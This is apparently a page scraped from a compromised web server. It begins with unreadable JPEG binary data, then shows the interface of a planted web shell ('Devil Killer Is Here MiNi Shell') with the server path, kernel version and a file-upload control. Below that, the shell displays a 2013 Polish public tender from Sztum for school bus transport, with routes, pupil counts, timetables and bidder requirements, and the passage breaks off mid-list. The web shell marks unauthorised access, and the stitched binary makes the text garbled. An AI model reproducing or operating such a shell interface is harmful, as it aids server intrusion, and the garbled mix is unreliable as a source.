JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/97735-N-2013.html

<p class="kh_header"><b>Sztum: Dowóz uczniów z terenu Miasta i Gminy Sztum do gimnazjów, szkół podstawowych i publicznych przedszkoli prowadzonych przez Miasto i Gminę Sztum w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 97735 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Zespół Oświaty w Sztumie , ul. Mickiewicza 39, 82-400 Sztum, woj. pomorskie, tel. 55 640 6327, faks 55 640 6327.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów z terenu Miasta i Gminy Sztum do gimnazjów, szkół podstawowych i publicznych przedszkoli prowadzonych przez Miasto i Gminę Sztum w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dowóz uczniów zamieszkałych na terenie Miasta i Gminy Sztum do gimnazjów, szkół podstawowych i publicznych przedszkoli, dla których organem prowadzącym jest Miasto i Gmina Sztum oraz ich odwóz po zakończonych zajęciach lekcyjnych wraz z zapewnieniem im opieki podczas transportu, w roku szkolnym 2013/2014, za wyjątkiem dni ustawowo wolnych od pracy. Dowóz organizowany jest do niżej wymienionych placówek oświatowych:
1)	Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, 
2)	Zespołu Szkół w Czerninie, w skład którego wchodzi: Gimnazjum z Oddziałami Integracyjnymi Nr 2 w Czerninie, Szkoła Podstawowa w Oddziałami Integracyjnymi im. Rodziny Donimirskich
w Czerninie oraz Publiczne Przedszkole w Czerninie,
3)	Zespołu Szkół w Gościszewie, w skład którego wchodzi: Szkoła Podstawowa w Gościszewie i Publiczne Przedszkole w Gościszewie,
4)	Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, 
5)	Szkoły Podstawowej w Nowej Wsi, 
6)	Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie. 
2.	Dowóz uczniów odbywa się na podstawie imiennych biletów miesięcznych, które Przewoźnik zobowiązany jest co miesiąc przygotować i przekazać uczniom uprawnionym do dowozu.

V.	OPIS CZĘŚCI ZAMÓWIENIA:
1.	Zamawiający dopuszcza składanie ofert częściowych (liczba części 6).
2.	Przedmiot zamówienia podzielono na następujące części:
1)	Część nr 1: Dowóz uczniów do Gimnazjum Nr 1 im. Jana Pawła II w Sztumie oraz Zespołu Szkół w Gościszewie, i odwóz po zakończonych zajęciach lekcyjnych: 
a)	z miejscowości: Koniecwałd, Gronajny, Koniecwałd PGR, Węgry do Zespołu Szkół w Gościszewie, 
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Gościszewie na trasie wynosi: 70 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50
i odwóz po godzinie 12:45, 14:40.

b)	z miejscowości: Gościszewo, Węgry, Goraj, Koniecwałd PGR, Gronajny, Koniecwałd do Gimnazjum Nr im. Jana Pawła II w Sztumie.
Przewidywana liczba uczniów dowożonych do Gimnazjum Nr 1 im. Jana Pawła II w Sztumie na trasie wynosi 42 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50 i odwóz po godzinie 12:40; 14:35 (czwartek-piątek) i 15:20 (poniedziałek-środa).

2)	Część nr 2: Dowóz uczniów do Zespołu Szkół w Czerninie, i  odwóz  po zakończonych zajęciach lekcyjnych:
a)	z miejscowości: Piekło do Zespołu Szkół w Czerninie.
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 49 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50 i odwóz po godzinie 12:50, 14:30. Odwóz dotyczy zarówno dzieci zamieszkałych w Piekle jak i w Białej Górze (lit. b).

b)	z miejscowości: Biała Góra do Zespołu Szkół w Czerninie.
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 30 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50.


3)	Część nr 3: Dowóz uczniów do Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie i odwóz po zakończonych zajęciach lekcyjnych:
a)	z miejscowości: Koślinka, Kępina do Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie
Przewidywana liczba uczniów dowożonych na trasie wynosi: 30 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do przedszkola najpóźniej na godzinę 7:30; do szkoły na godzinę 7:50 oraz dodatkowo w środy na godzinę 9:50, a także do gimnazjum na godzinę 7:50; odwóz po godzinie: 12:40; 14:35 (piątek); 15:30 (poniedziałek - czwartek).

b)	Pietrzwałd, Barlewice, Barlewiczki do Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie.
Przewidywana liczba uczniów dowożonych na trasie wynosi: 45 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do przedszkola najpóźniej na godzinę 7:30; do szkoły na godzinę 7:50 oraz dodatkowo w środy na godzinę 9:50, do gimnazjum na godzinę 7:50; odwóz po godzinie: 12:40; 14:35 (piątek), 15:30 (poniedziałek - czwartek).

4)	Część Nr 4: Dowóz do Zespołu Szkół w Czerninie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie i odwóz po zakończonych zajęciach lekcyjnych:

a)	z miejscowości: Ramzy Małe do Zespołu Szkół w Czerninie,
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 5 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50 i odwóz po godzinie 14:30.
b)	z miejscowości: Zajezierze do Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie:
Przewidywana liczba uczniów dowożonych na trasie wynosi 9 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do przedszkola najpóźniej na godzinę 7:30; do szkoły na godzinę 7:50 oraz dodatkowo w środy na godzinę 9:50, do gimnazjum na godzinę 7:50; odwóz po godzinie: 12:40; 14:35 (piątek); 15:30 (poniedziałek - czwartek).

c)	Sztumskie Pole ul. Lądziki, Łąkowa, Polanka, Długa do Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie: 
Przewidywana liczba uczniów dowożonych na trasie wynosi: 40 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do przedszkola najpóźniej na godzinę 7:30; do szkoły na godzinę 7:50 oraz dodatkowo w środy na godzinę 9:50, do gimnazjum na godzinę 7:50; odwóz po godzinie: 12:40; 14:35 (piątek); 15:30 (poniedziałek - czwartek).

5)	Część Nr 5: Dowóz do Zespołu Szkół w Czerninie, Szkoły Podstawowej w Nowej Wsi i odwóz po zakończonych zajęciach lekcyjnych:
a)	z miejscowości: Sztumska Wieś, Sztumska Wieś Zakład Rolny, Parowy do Szkoły Podstawowej w Nowej Wsi.
Przewidywana liczba uczniów dowożonych do Szkoły Podstawowej w Nowej Wsi na trasie wynosi 40 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:30 i 8:30 odwóz po godzinie 13:05 (środa-czwartek), 14:00 (poniedziałek - piątek) oraz 14:50 (poniedziałek - wtorek).
b)	z miejscowości: Nowa Wieś, Parowy, Sztumska Wieś Zakład Rolny, Sztumska Wieś do Zespołu Szkół w Czerninie.
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 41 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50
i odwóz po godzinie 14:30.

6)	Część Nr 6: Dowóz do Zespołu Szkół w Czerninie, Szkoły Podstawowej w Nowej Wsi, Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie i odwóz po zakończonych zajęciach lekcyjnych:
a)	z miejscowości: Uśnice, Parpary, Sztumskie Pole ul. Żeromskiego do Szkoły Podstawowej Nr 2 im. Maksymiliana Golisza w Sztumie, Gimnazjum Nr 1 im. Jana Pawła II w Sztumie, Publicznego Przedszkola z Oddziałami Integracyjnymi Nr 1 im. Kubusia Puchatka w Sztumie.
Przewidywana liczba uczniów dowożonych na trasie wynosi: 48 (na podstawie miesiąca maja 2013 roku).
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do przedszkola najpóźniej na godzinę 7:30; do szkoły na godzinę 7:50 oraz dodatkowo w środy na godzinę 9:50, do gimnazjum na godzinę 7:50; odwóz po godzinie: 12:40; 14:35 (piątek); 15:30 (poniedziałek - czwartek).
b)	z miejscowości: Cygusy, Szpitalna Wieś, Górki do Zespołu Szkół w Czerninie
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 40 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50 i odwóz po godzinie: 13:40 i 14:30. 
c)	z miejscowości: Michorowo, Polaszki, Postolin, Postolin Zakład Rolny do Zespołu Szkół w Czerninie. 
Przewidywana liczba uczniów dowożonych do Zespołu Szkół w Czerninie na trasie wynosi 36 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:50 i odwóz po godzinie: 14:30. 
d)	z miejscowości: Postolin Zakład Rolny, Postolin, Polaszki, Michorowo do Szkoły Podstawowej w Nowej Wsi.
Przewidywana liczba uczniów dowożonych do Szkoły Podstawowej w Nowej Wsi na wynosi 31 (na podstawie miesiąca maja 2013 roku). 
Planowana ilość kursów w dniach zajęć szkolnych: dowóz do szkoły na godzinę 7:30 i 8:30 odwóz po godzinie 13:05 (środa-czwartek), 14:00 (poniedziałek - piątek) oraz 14:50 (poniedziałek - wtorek).

3.	Liczba uczniów dowożonych do poszczególnych placówek oświatowych, o których mowa w części V pkt 2 niniejszej SIWZ może ulec zmianie. W takim wypadku Wykonawca zobowiązany jest zapewnić środek transportu - autobus o liczbie miejsc siedzących nie mniejszej niż liczba uczniów uprawnionych do dowozu do poszczególnych placówek oświatowych.

4.	W przypadku zmian godzinowych w szkolnych planach zajęć planowane godziny dowozu oraz odwozu uczniów do poszczególnych placówek oświatowych, określone w części V pkt 2 niniejszej SIWZ mogą ulec zmianie. W takim wypadku Wykonawca  zobowiązany jest niezwłocznie dostosować rozkład jazdy autobusów do potrzeb Zamawiającego.

5.	Szczegółowe wymagania stawiane Wykonawcy, w tym sposób realizacji zamówienia dla każdej z części zamówienia określonych w części V punkcie 2 niniejszej SIWZ określa projekt umowy stanowiący odpowiednio Załącznik nr 2 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże, że posiada aktualną licencję na krajowy transport drogowy osób autobusami wydaną przez Starostę właściwego ze względu na siedzibę Wykonawcy, zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (tekst jednolity: Dz. U. z 2012 roku poz. 1265 z późniejszymi zmianami).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający stawia szczególnych wymagań w zakresie spełniania tego warunku. Ocena spełnienia wyżej wskazanego warunku nastąpi poprzez złożenie przez Wykonawcę oświadczenia, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże, że dysponuje lub będzie dysponował w celu realizacji zamówienia co najmniej:
a)	w części Nr 1: 1 autobusem o ilości miejsc siedzących minimum 55, dopuszczonym w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób,
b)	w części Nr 2: 1 autobusem o ilości miejsc siedzących minimum 49 oraz 1 autobusem o ilości miejsc siedzących minimum 40, dopuszczonymi w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób,
c)	w części Nr 3: 2 autobusami o ilości miejsc siedzących minimum 49, dopuszczonymi w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób,
d)	w części Nr 4: 1 busem o ilości miejsc siedzących minimum 15 oraz 1 autobusem o ilości miejsc siedzących minimum 30 dopuszczonymi w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób,
e)	w części Nr 5: 1 autobusem o ilości miejsc siedzących minimum 40, dopuszczonym w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób,
f)	w części Nr 6: 1 autobusem o ilości miejsc siedzących minimum 55 oraz 1 autobusem o ilości miejsc siedzących minimum 40, dopuszczonym w oparciu o aktualnie obowiązujące przepisy do transportu drogowego osób.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca jednoznacznie wykaże, że dysponuje lub będzie dysponował w celu realizacji zamówienia co najmniej:
a)	w części Nr 1: 1 osobą posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów, 
b)	w części Nr 2: 2 osobami tj. po 1 osobie do każdego z pojazdów określonych w ppkt 3 lit. b  posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów, 
c)	w części Nr 3: 2 osobami tj.: po 1 osobie do każdego z pojazdów określonych w ppkt 3 lit. f  posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów,
d)	w części Nr 4: 2 osobami tj.: po 1 osobie do każdego z pojazdów określonych w ppkt 3 lit. f  posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów,
e)	w części Nr 5: 1 osobą posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów, 
f)	w części Nr 6: 2 osobami tj. po 1 osobie do każdego z pojazdów określonych w ppkt 3 lit. f  posiadającą uprawnienia oraz spełniającą wymogi dla kierowcy pojazdów do przewozu drogowego osób określone w UPRD oraz posiadającą co najmniej roczne doświadczenie w prowadzeniu takich pojazdów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Ocena spełnienia wyżej wskazanego warunku nastąpi poprzez złożenie przez Wykonawcę oświadczenia, którego wzór stanowi załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o którym mowa w pkt III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawione z odpowiednią datą wymaganą dla tych dokumentów.
2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Istotne zmiany postanowień zawartej umowy w stosunku do treści oferty złożonej przez Wykonawcę, którego oferta została wybrana jako oferta najkorzystniejsza, są możliwe w zakresie określonym w projekcie umowy.
2.	Wszelkie zmiany do umowy wymagają formy pisemnej pod rygorem nieważności.
3.	Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której zawarto umowę. Zmiany mogą dotyczyć:
1)	terminu realizacji przedmiotu umowy,
